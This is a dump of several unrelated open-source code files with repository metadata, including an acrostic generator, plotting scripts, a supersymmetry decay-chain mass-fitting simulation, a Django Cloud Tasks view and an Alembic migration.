url(r'^home/$', app.session.views.home, name='home'),
]
|
[
"0s.dongmin@gmail.com"
] |
0s.dongmin@gmail.com
|
2b8227feb761065cb5bbc4d63f58e5982e62e35b
|
0e586424141e41891dc58b95ddb25fff472f2002
|
/acros/apps/generator/magic.py
|
e863fbad2eed021378d27b67c786b940987b4bc2
|
[] |
no_license
|
nicorellius/acrosite
|
facb682e95dc4847f1af3ba6f742abc64d038dd5
|
c64832a78738f57cdad1b7a07b81279342cdff75
|
refs/heads/master
| 2022-12-04T16:50:23.564543
| 2020-02-26T00:16:39
| 2020-02-26T00:16:39
| 25,777,397
| 2
| 0
| null | 2022-11-22T00:34:05
| 2014-10-26T15:07:33
|
Python
|
UTF-8
|
Python
| false
| false
| 3,083
|
py
|
import unittest
import operator
import nltk
def first_letter(word):
return word[0]
def get_formats(word):
"""
Uses word length to determine useful pos structure.
For example, given the word 'Fun', returns a list
of three parts of speech because 'Fun' has three letters or
several lists should they be available.
:param word: Use word length
:return: A set of parts of speech structures
"""
print(word)
#old_question = Word(word)
#print(old_question.word)
# todo
# check one-many mapping of word length to formats and return set of formats
# we could also return formats of size -+2 to account for word contractions
return []
def rank_formats(formats):
"""
Given a set of formats, this ranks them returning a
new mapping of the formats keyed by rank.
:param formats: A set of pos formats
:return: A mapping of those formats keyed and grouped by rank
"""
# todo
return {}
def get_word(format_element, knowledge):
return None
def update(acrostic, knowledge):
# knowledge + more info + current state of acrostic
return knowledge
def money_maker(word, theme):
"""
Given a word,
1. determine it's formats
2. for each format
map each pos element and theme to retrieve a word
update
3. rank each format
3. give the word with the best format score
Use Markov chains -- http://en.wikipedia.org/wiki/Parody_generator
:param word: A word
:return: An awesome phrase
"""
candidates = {}
knowledge = {}
for key, value in rank_formats(get_formats(word)):
# knowledge.self(key, theme)
acrostic = []
for format_element in value:
word = get_word(format_element, knowledge)
update(acrostic, knowledge)
acrostic.append(word)
candidates[acrostic] = knowledge
return max(candidates.iteritems(), key=operator.itemgetter(1))[0]
def get_format(acrostic):
"""
Given an acrostic or phrase string, this function will
return a list of the nltk tags which consist of the basic
parts of speech and other nltk specific tags that are useful
in the nltk universe.
:param acrostic: An acrostic or phrase string
:return: A list of nltk tags for each word
"""
tokens = nltk.word_tokenize(acrostic)
return [element[1] for element in nltk.pos_tag(tokens)]
class WordMagicTest(unittest.TestCase):
def test(self):
self.assertEqual(first_letter("Abracadabra"), "A")
self.assertEqual(get_format("So happy it's Thursday"), ['IN', 'JJ', 'PRP', 'VBZ', 'NNP'])
self.assertEqual(get_format("Thank God it's Friday"), ['NNP', 'NNP', 'PRP', 'VBZ', 'NNP'])
self.assertEqual(
get_format("We're always cuddling koala's yearly"),
['PRP', 'VBP', 'RB', 'VBG', 'NN', 'POS', 'JJ'])
# self.assertEqual(get_formats('sample'),'sample')
|
[
"nicorellius@gmail.com"
] |
nicorellius@gmail.com
|
31233364461835df2c43081144994282f4ec6fb9
|
1af44bdcbc3c15d3f6e436a7924dfd45f504ab3a
|
/01.jump to python/02.Data Science/4. Visualization/282_matplotlib_basic_histogram.py
|
1a6596ad54616f6c7081fcc544fd649f78d2ef6a
|
[] |
no_license
|
wql7654/bigdata_exam
|
f57c8b475690cbc5978009dbf8008bedff602e2a
|
c07ee711bb84407428ba31165185b9607b6825e8
|
refs/heads/master
| 2023-04-07T00:50:59.563714
| 2021-05-25T02:46:43
| 2021-05-25T02:46:43
| 180,915,985
| 0
| 0
| null | 2023-03-25T01:08:09
| 2019-04-12T02:36:08
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 723
|
py
|
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
mu1, mu2, sigma = 100, 130, 15
x1 = mu1 + sigma*np.random.randn(10000)
x2 = mu2 + sigma*np.random.randn(10000)
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
n, bins, patches = ax1.hist(x1, bins=50, normed=False, color='darkgreen')
n, bins, patches = ax1.hist(x2, bins=50, normed=False, color='orange', alpha=0.5)
ax1.xaxis.set_ticks_position('bottom')
ax1.yaxis.set_ticks_position('left')
plt.xlabel('Bins')
plt.ylabel('Number of Values in Bin')
fig.suptitle('Histograms', fontsize=14, fontweight='bold')
ax1.set_title('Two Frequency Distributions')
plt.savefig('histogram.png', dpi=400, bbox_inches='tight')
plt.show()
|
[
"studerande5@gmail.com"
] |
studerande5@gmail.com
|
5259e96e8c7daf9bb2b22b369534042c3cb434cf
|
31b51aeb96000318df21351b2ef6cb55f7c269c2
|
/HiNT/corelib.py
|
99d11739955e91cefcf71310c01c8bcf9d3bd653
|
[
"Artistic-1.0-Perl",
"MIT"
] |
permissive
|
suwangbio/HiNT
|
a26062f6c39929803a4aded5465743768a81b8c5
|
99f0aa91d10c5fccabcbd56035f6e3125650a720
|
refs/heads/master
| 2022-04-08T23:13:25.344196
| 2020-02-17T22:22:13
| 2020-02-17T22:22:13
| 240,967,519
| 0
| 0
|
NOASSERTION
| 2020-02-16T21:19:00
| 2020-02-16T21:18:59
| null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# print current time and information on screen
import subprocess
from subprocess import call as subpcall
import sys, os, time
import logging
error = logging.critical # function alias
warn = logging.warning
def Info(infoStr):
print("[%s] %s" %(time.strftime('%H:%M:%S'), infoStr))
def run_cmd(command):
subpcall (command, shell = True)
|
[
"1210070_suwang@tongji.edu.cn"
] |
1210070_suwang@tongji.edu.cn
|
c56605a1ff97ce5490fd9b73b12308ef4cae495d
|
50608ac21fb2124a8b73ba5299e947d8a3be142b
|
/simulation/python/inversion_v2.1_selvhenfall_xisquared-plotting.py
|
341f45fbec143208b4c69d91f144315092346064
|
[] |
no_license
|
jorgenem/master
|
88e71bc935af9cf23585d3b2ec191bc4e01f6c00
|
7e898f747d21ad13c205c16b1e89d41fa9ac1a7e
|
refs/heads/master
| 2020-05-20T12:34:14.786285
| 2015-06-04T23:26:22
| 2015-06-04T23:26:22
| 25,069,231
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,093
|
py
|
#import stuff
import numpy as np
import matplotlib.pyplot as plt
from math import pi
import scipy.optimize as sciopt
np.random.seed(2) # set seed for reproducibility
# ====== define useful functions ========
def proj(v,u):
# projects v onto u
if np.linalg.norm(u) > 0:
return np.dot(u,np.transpose(v))/float(np.dot(u,u.T)) * u
else:
return u
def minkowskidot(a,b):
# Inner product in Minkowski space
return float(a[0,0]*b[0,0]-a[0,1]*b[0,1]-a[0,2]*b[0,2]-a[0,3]*b[0,3])
def minkowskinorm(a):
# Inner product of a with a in Minkowski space
return minkowskidot(a,a)
def decayfun(m1,P1,m2,m3):
# Calculating four-momenta of particle 2&3 going back-to-back from
# decay of particle 1 in the frame where particle 1 has 4-mom P1
#
#
# particle 1 = decaying particle
# particle 2 & particle 3 = decay products
# primed system is rest frame of particle 1, unprimed is lab frame
# rotated system is at rest in lab system,
# but rotated so particle one goes in +x direction
p1 = P1[0,1:4]
p1abs = np.sqrt( float( np.dot( p1 , np.transpose(p1) ) ) ) # 3-momentum
# of particle 1 in
# lab frame
# == Kinematical decay in RF of particle 1 ==
p2absprime = 1.0/(2*m1) * np.sqrt( (m1**2-m2**2-m3**2)**2- 4*m2**2*m3**2 ) # abs-val
# of 3-momentum of particle 2/3 in RF of particle 1
U, V = np.random.uniform(0,1,2) # random
phi = 2*pi*U # point picking
theta = np.arccos(2*V-1) # on a sphere
# Calculate cartesian 3- and 4-momentum of particle 2&3
p2prime = np.matrix([ p2absprime*np.sin(theta)*np.cos(phi) ,
p2absprime*np.sin(theta)*np.sin(phi) ,
p2absprime*np.cos(theta) ])
p3prime = -p2prime
E2prime = np.sqrt( p2absprime**2 + m2**2 )
E3prime = np.sqrt( p2absprime**2 + m3**2 )
P2prime = np.matrix([ E2prime , p2prime[0,0] , p2prime[0,1] , p2prime[0,2] ])
P3prime = np.matrix([ E3prime , p3prime[0,0] , p3prime[0,1] , p3prime[0,2] ])
# == Back-transform to lab frame ==
# First check whether it is necessary to boost
if p1abs > 1e-10:
# Lorentz boost along x-direction to get to rotated lab frame
# (lab frame moves in negative x direction)
vlab = -p1abs/np.sqrt(p1abs**2 + m1**2) # velocity of particle 1 in lab frame
gamma = 1/np.sqrt(1-vlab**2)
P2rot = np.matrix([ gamma*(P2prime[0,0] - vlab*P2prime[0,1]) ,
gamma*(P2prime[0,1] - vlab*P2prime[0,0]) ,
P2prime[0,2] , P2prime[0,3] ])
P3rot = np.matrix([ gamma*(P3prime[0,0] - vlab*P3prime[0,1]) ,
gamma*(P3prime[0,1] - vlab*P3prime[0,0]) ,
P3prime[0,2] , P3prime[0,3] ])
# == Rotate back to lab frame ==
# Calculate the unit vectors of the rotated system axes in terms of lab axes
# The definition is that x axis is along p1.
# For the other axes we must make a choice - y&z directions are undetermined,
# only the yz plane is determined from x choice. But since we have drawn
# random angles and the yz plane is not boosted, the choice does not matter
# as long as we are consistent from event to event.
# So we pick two vectors orthogonal to p1 and do Gram-Schmidt orthogonalization:
v1 = p1
v2 = np.matrix([ p1[0,1] , -p1[0,0] , 0 ])
v3 = np.matrix([ p1[0,2] , 0 , -p1[0,0] ])
u1 = v1
u2 = v2 - proj(v2,u1)
u3 = v3 - proj(v3,u1) - proj(v3,u2)
xrot = u1/np.linalg.norm(u1) if np.linalg.norm(u1) > 0 else np.matrix([0,0,1])
yrot = u2/np.linalg.norm(u2) if np.linalg.norm(u2) > 0 else np.matrix([0,1,0])
zrot = u3/np.linalg.norm(u3) if np.linalg.norm(u3) > 0 else np.matrix([1,0,0])
# Form a matrix T which takes a vector in the lab basis to a vector
# in the rotated basis by
T = np.concatenate( (xrot , yrot , zrot) , axis=0 )
# What we need is to rotate from rotated basis to lab basis, so we need the inverse
# - which is the transpose, since rotation matrices are orthogonal.
# Also, to ease calculation, we let T be the 3x3 submatrix of T4, setting the [0,0]
#component of T4 to 1 to leave time component invariant under this spatial rotation
T4 = np.matrix([[1, 0, 0, 0],
[0,T[0,0],T[0,1],T[0,2]],
[0,T[1,0],T[1,1],T[1,2]],
[0,T[2,0],T[2,1],T[2,2]] ])
P2 = T4.T*P2rot.T
P3 = T4.T*P3rot.T
P2 = P2.T
P3 = P3.T
# If it was unneccessary, i.e. decay happened in lab frame, then
else:
P2 = P2prime
P3 = P3prime
# Finished!
return P2, P3
def smear(p,resolution):
# Smears 4-momentum according to AcerDET manual
r = np.random.randn()
p_smeared = p * ( 1 + r * resolution / np.sqrt(p[0,0]) )
return p_smeared
# ==== MAIN PART ====
# Set known parameters
# SM particle masses
# u-quark and electron mass set to zero
mquark = m1 = m5 = 0;
mlepton1 = m2 = m3 = 0;
mlepton2 = m6 = m7 = 0;
# Now to make a mass hypothesis (guess the correct one)
MSuL = 565.312 # Mass of ~uL, ~cL
MSdL = 570.734 # Mass of ~dl, ~sL
Msquark = MZ =(MSuL+MSdL)/2.0 # mean squark mass, fit this
MN2 = Mchi2 = MY = 180.337 # Mass of ~chi02
Mslepton = MseR = MX = 144.06 # Mass of ~eR, ~muR
# include left-handed sleptons? Must be done in the branchings before Herwig simulation in case
MN1 = Mchi1 = MN = 9.70071979E+01 # Mass of ~chi01 (dark matter!)
MZprim = MZ
MYprim = MY
MXprim = MX
MNprim = MN
true_values = np.array([MZ,MY,MX,MN])
N = 100
Dlist = []
Elist = []
Adetlist = np.zeros(0)
A_nosmeardetlist = np.zeros(0)
# Define normalizing mass (characteristic mass scale of the problem)
Mnorm = 100
# print "Mnorm = ", Mnorm
# Save invariant masses for making triangle
invariant_mass_between_c1_leptons = []
# N - How much loop?
for i in range(N):
# Loop over events to get 4-vectors for each particle for each event.
# Particles are numbered according to Webber (arXiv:0907.5307v2) fig. 1
# (the lepton/antilepton ordering is arbitrary in each chain, the lepton has been
# chosen as 2/6 and the antilepton as 3/7)
# string = root[i+2].text
# lines = string.splitlines()
#1st chain, p1-4
# Read squark 1 from file
# psquark1 = str(lines[4]).split()
# print "PDG number of particle 1: ",psquark1[0] # just to check
#p1 = [float(p1[9]), float(p1[6]), float(p1[7]), float(p1[8])]
# psquark1 = np.matrix([ float(psquark1[9]), float(psquark1[6]), float(psquark1[7]), float(psquark1[8])])
psquark1 = np.matrix([0,0,0,Msquark])
# #DEBUG
# psquark1 = np.matrix([ Msquark, 0, 0, 0]) # overwrite CompHEP data to start squarks at rest
# #/DEBUG
# Decay squark to quark and neutralino2
p1, pN21 = decayfun(Msquark,psquark1,mquark,MN2)
# Decay neutralino2 to lepton1 and slepton
p2, pseR1 = decayfun(MN2,pN21,mlepton1,MseR)
# Decay slepton to (anti)lepton1 and neutralino1
p3, p4 = decayfun(MseR,pseR1,mlepton1,MN1)
#2nd chain, p5-8
# psquark2 = str(lines[5]).split()
# # print "PDG number of particle 5: ",psquark2[0] # just to check
# psquark2 = np.matrix([ float(psquark2[9]), float(psquark2[6]), float(psquark2[7]), float(psquark2[8])])
psquark2 = np.matrix([0,0,0,Msquark])
# #DEBUG
# psquark2 = np.matrix([ Msquark, 0, 0, 0]) # overwrite CompHEP data to start squarks at rest
# #/DEBUG
# See whether CompHEP produces squarks off-shell
# print minkowskinorm(psquark1) - Msquark**2
# print minkowskinorm(psquark2) - Msquark**2
# Decay (anti)squark to (anti)quark and neutralino2
p5, pN22 = decayfun(Msquark,psquark2,mquark,MN2)
# Decay neutralino2 to lepton2 and slepton
p6, pseR2 = decayfun(MN2,pN22,mlepton2,MseR)
# Decay slepton to (anti)lepton2 and neutralino1
p7, p8 = decayfun(MseR,pseR2,mlepton2,MN1)
# DETERMINANT TEST
# pxmiss_nosmear = - p1[0,1] - p2[0,1] - p3[0,1] - p5[0,1] - p6[0,1] - p7[0,1]
# pymiss_nosmear = - p1[0,2] - p2[0,2] - p3[0,2] - p5[0,2] - p6[0,2] - p7[0,2]
# A_nosmear = 1/Mnorm*2*np.matrix([[ p1[0,1] , p1[0,2] , p1[0,3] , -p1[0,0] , 0 , 0 , 0 , 0 ],
# [ p2[0,1] , p2[0,2] , p2[0,3] , -p2[0,0] , 0 , 0 , 0 , 0 ],
# [ p3[0,1] , p3[0,2] , p3[0,3] , -p3[0,0] , 0 , 0 , 0 , 0 ],
# [ 0.5*pxmiss_nosmear , 0 , 0 , 0 , 0.5*pxmiss_nosmear,0 , 0 , 0 ],
# [ 0 , 0 , 0 , 0 , p5[0,1] , p5[0,2] , p5[0,3] , -p5[0,0] ],
# [ 0 , 0 , 0 , 0 , p6[0,1] , p6[0,2] , p6[0,3] , -p6[0,0] ],
# [ 0 , 0 , 0 , 0 , p7[0,1] , p7[0,2] , p7[0,3] , -p7[0,0] ],
# [ 0 ,0.5*pymiss_nosmear, 0 , 0 , 0 , 0.5*pymiss_nosmear , 0 , 0 ]])
# / DETERMINANT TEST
# Smear, r percent resolution
# r = resolution # percent/100 momentum smearing
# p1 = smear(p1,r)
# p2 = smear(p2,r)
# p3 = smear(p3,r)
# p5 = smear(p5,r)
# p6 = smear(p6,r)
# p7 = smear(p7,r)
# Check invariant mass of initial colliding partons?
#print minkowskinorm(p1+p2+p3+p4+p5+p6+p7+p8)
# Check that the invariant mass of particles is close to shell mass
# print minkowskinorm(p1) - m1**2
# print minkowskinorm(p2) - m2**2
# print minkowskinorm(p3) - m3**2
# print minkowskinorm(p4) - MN**2
# print minkowskinorm(p5) - m5**2
# print minkowskinorm(p6) - m6**2
# print minkowskinorm(p7) - m7**2
# print minkowskinorm(p8) - MNprim**2
# Check if invariant mass of decays match mass of decaying
# print "p3+p4 ", np.sqrt(abs(minkowskinorm(p3+p4) - MX**2))
# print "p2+p3+p4 ", np.sqrt(abs(minkowskinorm(p2+p3+p4) - MY**2))
# print "p1+p2+p3+p4 ", np.sqrt(abs(minkowskinorm(p1+p2+p3+p4) - MZ**2))
# print "p7+p8 ", np.sqrt(abs(minkowskinorm(p7+p8) - MXprim**2))
# print "p6+p7+p8 ", np.sqrt(abs(minkowskinorm(p2+p3+p4) - MYprim**2))
# print "p5+p6+p7+p8 ", np.sqrt(abs(minkowskinorm(p1+p2+p3+p4) - MZprim**2))
# Calculate invariant mass between leptons for triangle plotting
# invmass_c1leptons = np.sqrt(minkowskinorm(p2+p3)) # calculate invariant
# invariant_mass_between_c1_leptons.append(invmass_c1leptons) # mass between leptons in chain 1
# ==== Define Webber's stuff ====
# need the pxmiss and pymiss, taken from the actual neutralino transverse momenta
# (this is cheating, of course)
# pxmiss = p4[0,1]+p8[0,1]
# pymiss = p4[0,2]+p8[0,2]
# Calculate missing transverse from (smeared) visible particles
pxmiss = - p1[0,1] - p2[0,1] - p3[0,1] - p5[0,1] - p6[0,1] - p7[0,1]
pymiss = - p1[0,2] - p2[0,2] - p3[0,2] - p5[0,2] - p6[0,2] - p7[0,2]
m1square = minkowskinorm(p1)
m2square = minkowskinorm(p2)
m3square = minkowskinorm(p3)
m5square = minkowskinorm(p5)
m6square = minkowskinorm(p6)
m7square = minkowskinorm(p7)
# print "pxmiss", pxmisstrue - pxmiss
# print "pymiss", pymisstrue - pymiss
#A matrix
A = 2*np.matrix([[ p1[0,1] , p1[0,2] , p1[0,3] , -p1[0,0] , 0 , 0 , 0 , 0 ],
[ p2[0,1] , p2[0,2] , p2[0,3] , -p2[0,0] , 0 , 0 , 0 , 0 ],
[ p3[0,1] , p3[0,2] , p3[0,3] , -p3[0,0] , 0 , 0 , 0 , 0 ],
[ 0.5*pxmiss, 0 , 0 , 0 , 0.5*pxmiss,0 , 0 , 0 ],
[ 0 , 0 , 0 , 0 , p5[0,1] , p5[0,2] , p5[0,3] , -p5[0,0] ],
[ 0 , 0 , 0 , 0 , p6[0,1] , p6[0,2] , p6[0,3] , -p6[0,0] ],
[ 0 , 0 , 0 , 0 , p7[0,1] , p7[0,2] , p7[0,3] , -p7[0,0] ],
[ 0 ,0.5*pymiss, 0 , 0 , 0 , 0.5*pymiss , 0 , 0 ]])
A = A/Mnorm # normalize A
# print np.linalg.det(A)
#A inverse
# print A
Ainv = A.I
#B matrix
B = np.matrix([[-1,1,0,0,0,0,0,0],
[0,-1,1,0,0,0,0,0],
[0,0,-1,1,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,-1,1,0,0],
[0,0,0,0,0,-1,1,0],
[0,0,0,0,0,0,-1,1],
[0,0,0,0,0,0,0,0]])
#C vector
C = np.matrix([ 2*minkowskidot(p1,p2) + 2*minkowskidot(p1,p3) + m1square,
2*minkowskidot(p2,p3) + m2square,
m3square,
pxmiss**2,
2*minkowskidot(p5,p6) + 2*minkowskidot(p5,p7) + m5square,
2*minkowskidot(p6,p7) + m6square,
m7square,
pymiss**2])
C = C/Mnorm**2 # normalize C
# print C
# Composite matrix & vector D and E
D = np.dot(Ainv,B)
E = np.dot(Ainv,C.T)
# store D and E
Dlist.append(D)
Elist.append(E)
# Store determinants of A w&w/o smearing
# Adetlist = np.append(Adetlist, np.linalg.det(A))
# A_nosmeardetlist = np.append(A_nosmeardetlist, np.linalg.det(A_nosmear))
# ===========
# From here on we can forget about the event momenta, everything
# is stored in Dn and En for each event. Time to guess the masses.
# ===========
# # Now to make a mass hypothesis (guess the correct one)
# MZ = 5.45421001e+02 # Mass of ~uL
# MY = 1.80337030e+02 # Mass of ~chi02
# MX = 1.44059825e+02 # Mass of ~eR
# MN = 9.70071979e+01 # Mass of ~chi01 (dark matter!)
# MZprim = MZ
# MYprim = MY
# MXprim = MX
# MNprim = MN
# M = np.matrix([ MZ**2 , MY**2 , MX**2 , MN**2 , MZprim**2 , MYprim**2 , MXprim**2 , MNprim**2 ])
# M = M/Mnorm
# print M
# # # Calculate the "chi-squared" error of the correct hypothesis
# P = [] # store Pn
# xisquared = 0
# offshell = [] # list to store p4nsquared - MN**2
# for n in range(N):
# Pn = np.dot(Dlist[n],M.T) + Elist[n]
# P.append(Pn) #store in case needed
# #print "hei", Pn.shape
# p4nsquared = Pn[3,0]**2 - Pn[0,0]**2 - Pn[1,0]**2 - Pn[2,0]**2
# p8nsquared = Pn[7,0]**2 - Pn[4,0]**2 - Pn[5,0]**2 - Pn[6,0]**2
# xisquared += (p4nsquared - MN**2)**2 + (p8nsquared - MNprim**2)**2
# offshell.append(abs(p4nsquared-MN**2))
# offshell.append(abs(p8nsquared-MNprim**2))
# print "xisquared", xisquared/Mnorm**2
# print np.mean(offshell)
# === Plot some results ===
# plt.hist(invariant_mass_between_c1_leptons, bins=100)
# plt.title('Distribution of lepton pair invariant mass in %d events.' % N)
# plt.xlabel(r'$m_{l^+l^-}$')
# plt.ylabel('Occurences')
# plt.show()
# Plot det(A) scatter smear vs nosmear
# plt.loglog(abs(A_nosmeardetlist), abs(Adetlist), 'bx')
# plt.hold('on')
# plt.plot([min(abs(Adetlist)),max(abs(Adetlist))], [min(abs(Adetlist)),max(abs(Adetlist))], 'r')
# plt.title('Per-event det(A) unsmeared vs smeared, smearing resolution %.1f' % resolution)
# plt.xlabel(r'$\mathrm{det}(A_\mathrm{non-smear})$')
# plt.ylabel(r'$\mathrm{det}(A_\mathrm{smear})$')
# plt.show()
# ============ Minimization to best fit =================
# import minuit
# xi-squared function to minimize with identical chains
def xisquared_identical_chains(MZ, MY, MX, MN, Nevents, i): #, MZp, MYp, MXp, MNp):
Nevents = int(Nevents)
i = int(i)
# Duplicate masses for primed chain
MZp, MYp, MXp, MNp = MZ, MY, MX, MN# = Masses
# Set up Webber's M vector
M = np.matrix([ MZ**2 , MY**2 , MX**2 , MN**2 , MZp**2 , MYp**2 , MXp**2 , MNp**2 ])
M = M/Mnorm**2 #normalise M
# Calculate the "chi-squared" error of the hypothesis
# P = [] # store Pn
xisquared = 0
# offshell = [] # list to store p4nsquared - MN**2
for n in range(i*Nevents, (i+1)*Nevents):
Pn = np.dot(Dlist[n],M.T) + Elist[n]
# P.append(Pn) #store in case needed
p4nsquared = Pn[3,0]**2 - Pn[0,0]**2 - Pn[1,0]**2 - Pn[2,0]**2
p8nsquared = Pn[7,0]**2 - Pn[4,0]**2 - Pn[5,0]**2 - Pn[6,0]**2
xisquared += (p4nsquared - M[0,3])**2 + (p8nsquared - M[0,7])**2 # p4/p8 is normalized by MN.
# offshell.append(abs(p4nsquared-MN**2))
# offshell.append(abs(p8nsquared-MNprim**2))
xisquared = xisquared/float(Nevents)#/100**4
# print xisquared
# xisquaredlist.append(xisquared)
return xisquared
# Plot xi^2 as function of some masses to see how bumpy
from mpl_toolkits.mplot3d import Axes3D
minm = 0.0
maxm = 3
Nlinspace = 300
Nevents=25
bin_number=1
msquark_linspace = np.linspace(Msquark*minm, Msquark*maxm, Nlinspace)
mchi2_linspace = np.linspace(Mchi2*minm, Mchi2*maxm, Nlinspace)
mslepton_linspace = np.linspace(Mslepton*minm, Mslepton*maxm, Nlinspace)
mchi1_linspace = np.linspace(Mchi1*minm, Mchi1*maxm, Nlinspace)
msquark_mesh1, mchi2_mesh = np.meshgrid(msquark_linspace, mchi2_linspace)
msquark_mesh2, mslepton_mesh = np.meshgrid(msquark_linspace, mslepton_linspace)
msquark_mesh3, mchi1_mesh = np.meshgrid(msquark_linspace, mchi1_linspace)
# mslepton_mesh2, mchi1_mesh2 = np.meshgrid(mslepton_linspace, mchi1_linspace)
xi2_plot_squarkchi2 = np.log10(xisquared_identical_chains(msquark_mesh1, mchi2_mesh, Mslepton, Mchi1, Nevents,bin_number-1))
xi2_plot_squarkslepton = np.log10(xisquared_identical_chains(msquark_mesh2, Mchi2, mslepton_mesh, Mchi1, Nevents, bin_number-1))
xi2_plot_squarkchi1 = np.log10(xisquared_identical_chains(msquark_mesh3, Mchi2, Mslepton, mchi1_mesh, Nevents, bin_number-1))
# xi2_plot_sleptonchi1 = np.log10(xisquared_identical_chains(480, 150, mslepton_mesh2, mchi1_mesh2, Nevents, bin_number-1))
# Plot 1: squark-chi2
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh1, mchi2_mesh, xi2_plot_squarkchi2, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde \chi_2^0}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# Plot 2: squark-slepton
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh2, mslepton_mesh, xi2_plot_squarkslepton, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde l}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# Plot 3: squark-chi1
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh3, mchi1_mesh, xi2_plot_squarkchi1, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde \chi_1^0}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# print 'smearing', "%2.2f ," % smearing_resolution
# print 'True masses', true_values
# print 'Best-fit values', best_fit
# print 'relative_fit_error', relative_fit_error, ', abs mean fit error', "%.2e" %np.mean(np.abs(relative_fit_error))
# print "number of runs =", len(xisquaredlist), ", mean xi^2 =", np.mean(xisquaredlist), "final xi^2 =", xisquaredlist[-1]
# Minitial = [5.5e2, 1.8e2, 1.5e2, 1e2, 5.5e2, 1.8e2, 1.5e2, 1e2] # Starting point for parameter scan
# Nlist = range(100,1000, 50)
# relative_fit_error_list = []
# for N in Nlist:
# true_values, best_fit, relative_fit_error = minimize(N, 0, Minitial)
# relative_fit_error_list.append(relative_fit_error[0])
# plt.plot(relative_fit_error_list)
# plt.show()
|
[
"j.e.midtbo@fys.uio.no"
] |
j.e.midtbo@fys.uio.no
|
de88552d5cb42be220489857bedbf80a50e4b048
|
d442aa2dd41cc8f046d1c44fd80c069689c8ac01
|
/django_cloud_tasks/views.py
|
5a91d722bce60a45bcc3b6101ecd14ce060c1913
|
[
"Apache-2.0"
] |
permissive
|
guilhermearaujo/django-cloud-tasks
|
27593d616937184bf708318da074f2017e85e25f
|
946712258a23a00062d071031c40553946ebfe6a
|
refs/heads/main
| 2023-02-03T16:43:32.990856
| 2020-12-18T19:04:07
| 2020-12-18T19:04:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,667
|
py
|
import base64
import json
from typing import Dict
from django.apps import apps
from django.http import HttpResponse
from django.views.generic import View
class GoogleCloudTaskView(View):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.tasks = self._get_available_tasks()
def _get_available_tasks(self):
return apps.get_app_config('django_cloud_tasks').tasks
def post(self, request, task_name, *args, **kwargs):
try:
task_class = self.tasks[task_name]
data = json.loads(request.body)
output, status = task_class().execute(data=data)
if status == 200:
result = {'result': output}
else:
result = {'error': output}
except KeyError:
status = 404
result = {'error': f"Task {task_name} not found"}
response = HttpResponse(status=status, content=json.dumps(result), content_type='application/json')
return response
def _parse_task_args(self, body: str) -> Dict:
return json.loads(body)
# More info: https://cloud.google.com/pubsub/docs/push#receiving_messages
class GoogleCloudSubscribeView(GoogleCloudTaskView):
def _get_available_tasks(self):
return apps.get_app_config('django_cloud_tasks').subscribers
def _parse_task_args(self, body: str) -> Dict:
event = super()._parse_task_args(body=body)
task_args = {}
if 'data' in event:
task_args['message'] = json.loads(base64.b64decode(event['data']).decode('utf-8'))
task_args['attributes'] = event.get('attributes', {})
return task_args
|
[
"joao@daher.dev"
] |
joao@daher.dev
|
18c4535268b877c0562c99cbc76515ee37ca383d
|
9c9d08fd1821a3183bf5640a969cf96464ca748f
|
/migrations/versions/b165aaa7dbae_.py
|
64fb4b757f0b956cf7f9ad1887fb1b4b27de4da6
|
[] |
no_license
|
pengjinfu/blog-1
|
f102a0d5cf20dfd8a6d0293ebadbaf44da0c42ef
|
01025a3d311505331d20a8caf2c66143c781af15
|
refs/heads/master
| 2020-06-26T13:08:10.891939
| 2017-06-22T09:18:31
| 2017-06-22T09:18:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
"""empty message
Revision ID: b165aaa7dbae
Revises: 24cd77a2728d
Create Date: 2017-03-18 16:17:25.670714
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b165aaa7dbae'
down_revision = '24cd77a2728d'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('avatar_hash', sa.String(length=32), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'avatar_hash')
# ### end Alembic commands ###
|
[
"1782964880@qq.com"
] |
1782964880@qq.com
|
7f3bff7b12d76bdaf22d047eafd52e5a2dcf4f36
|
3c898b1aec7009110c63504d5a56e31914625d1b
|
/acrylamid/filters/rstx_code.py
|
a777d9886f403dcd1875f77ad78ddad7f3ac51cf
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
MagicSword/acrylamid
|
e294b151ed6305f37fc5a5fdd4f1f0fb999a22f7
|
6f34bc5fb2175af1103aec7a910ef48a6842de03
|
refs/heads/master
| 2021-01-16T21:30:58.564719
| 2012-06-22T16:00:50
| 2012-06-22T16:45:38
| 4,817,948
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,457
|
py
|
# -*- encoding: utf-8 -*-
#
# Copyright: (c) 2010-2012 by Rafael Goncalves Martins
